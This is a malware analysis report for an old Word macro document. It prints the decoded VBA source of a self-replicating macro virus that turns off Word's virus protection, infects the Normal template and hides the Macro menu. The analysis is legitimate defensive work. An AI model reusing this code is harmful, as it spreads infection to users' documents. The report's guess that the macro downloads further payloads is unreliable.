Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a8261b628c5296fc…

MALICIOUS

Office (OLE)

38.0 KB Created: 1999-03-30 06:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1ddab69059f6ad0ab46fbcd55d605e32 SHA-1: d5569eef271184aea393f1de31fcec88fd19d4b5 SHA-256: a8261b628c5296fc97e5328f3e459ed31e89967970dd31684d0287ecb9bc6aac
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros with AutoOpen and AutoClose functions, indicating malicious intent. The document body provides instructions for removing 'Happy99.exe' and related files, which appears to be a social engineering tactic to mask the true malicious activity. The VBA script likely attempts to download or execute further payloads, as suggested by the presence of macro code and the heuristic firings.

Heuristics 5

  • ClamAV: Doc.Trojan.Class-39 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-39
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18152 bytes
SHA-256: 115f52dd313173b53b8de346b0649b54cc6c3e3b9a6d31d749a7482d50e89a14
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

Dim rsxg, roxg, xixg, xxig As Integer: Dim xxey, xexy, exxy, exdy, cxiy, cixy, xicy, eoxy, xoey, oxey, ciiy, rxey, rexy, exry, nixy, ixny, nxiy, lnry, nrly, rnly As String

Randomize

On Error GoTo bit

Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48)

rt = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines

dt = NormalTemplate.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines

If dt > 0 And rt > 0 Then GoTo bit

If dt = 0 Then

    Set Tri = NormalTemplate.VBProject.VBComponents

    Set rip = ActiveDocument.VBProject.VBComponents

    If Month(Now()) = 3 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(45) + Chr(82) + Chr(101) + Chr(115) + Chr(116) + Chr(32) + Chr(73) + Chr(110) + Chr(32) + Chr(80) + Chr(101) + Chr(97) + Chr(99) + Chr(101) + Chr(45)

    If Month(Now()) = 3 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(84) + Chr(105) + Chr(101) + Chr(44) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(107) + Chr(105) + Chr(116) + Chr(116) + Chr(121) + Chr(32) + Chr(67) + Chr(97) + Chr(116) + Chr(33)
  
    If Month(Now()) = 3 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(73) + Chr(32) + Chr(77) + Chr(73) + Chr(83) + Chr(83) + Chr(32) + Chr(89) + Chr(79) + Chr(85) + Chr(32) + Chr(58) + Chr(126) + Chr(40)

    rip.Item(Cos(Atn(CInt(1)))).Name = Tri.Item(Cos(Atn(CInt(1)))).Name

    rip.Item(Cos(Atn(CInt(1)))).Export Application.StartupPath & System.Version & Chr(46) + Chr(84) + Chr(105) + Chr(101)
    
End If

If rt = 0 Then Set Tri = ActiveDocument.VBProject.VBComponents

Tri.Item(Cos(Atn(CInt(1)))).codemodule.AddFromFile Application.StartupPath & System.Version & Chr(46) + Chr(84) + Chr(105) + Chr(101)

With Tri.Item(Cos(Atn(CInt(1)))).codemodule

    For j = Chr(49) To Chr(52)

    .deletelines Chr(49)

    Next j

    End With

If dt = 0 Then Tri.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 1, "Sub AutoClose()"

If dt = 0 Then Tri.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 83, "Sub ToolsMarco()"

If dt = 0 Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Enabled = False

If dt = 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

With Tri.Item(Cos(Atn(CInt(1)))).codemodule

   For j = Chr(50) To Tri.Item(Cos(Atn(CInt(1)))).codemodule.countoflines Step Chr(50)

    rsxg = Int(Rnd(11) * 4998) + 24: roxg = Int(Rnd(15) * 5863) + 33: xixg = Int(Rnd(44) * 3544) + 55: xxig = Int(Rnd(23) * 5745) + 44

    ciiy = Asc(rsxg): eoxy = Chr$(ciiy + 5): xoey = Chr$(ciiy - 14): oxey = Chr$(ciiy + 22): lnry = Chr$(ciiy - 4)

    cixy = Asc(roxg): rxey = Chr$(cixy + 7): rexy = Chr$(cixy - 16): exry = Chr$(cixy + 4): nrly = Chr$(cixy - 17)

    xicy = Asc(xixg): nixy = Chr$(xicy + 9): ixny = Chr$(xicy - 18): nxiy = Chr$(xicy + 8): rnly = Chr$(xicy - 33)
    
    cxiy = Asc(xxig): xxey = Chr$(cxiy + 4): xexy = Chr$(cxiy - 3): exxy = Chr$(cxiy + 18): exdy = Chr$(cxiy - 12)

    .replaceline j, Chr(39) & xxey & xexy & exxy & exdy & eoxy & rxey & nixy & xoey & rexy & ixny & oxey & exry & nixy & lnry & nrly & rnly & xxey & xexy & exxy & exdy & xoey & rexy & ixny & oxey & exry & nixy & rnly & xxey & xexy & exxy & exdy & xoey & eoxy & rxey & nixy & xoey & rexy & nixy & xoey & rexy & ixny & oxey & exry & nixy & lnry & nrly & rnly & xxey & xexy & exxy & exdy & xoey & rexy & ixny & oxey & exry & nixy & rnly & xxey

   Next j

End With

bit:

If dt <> 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

End Sub

Sub ViewVBCode() 'WM97/Tie.Tribute by 
... (truncated)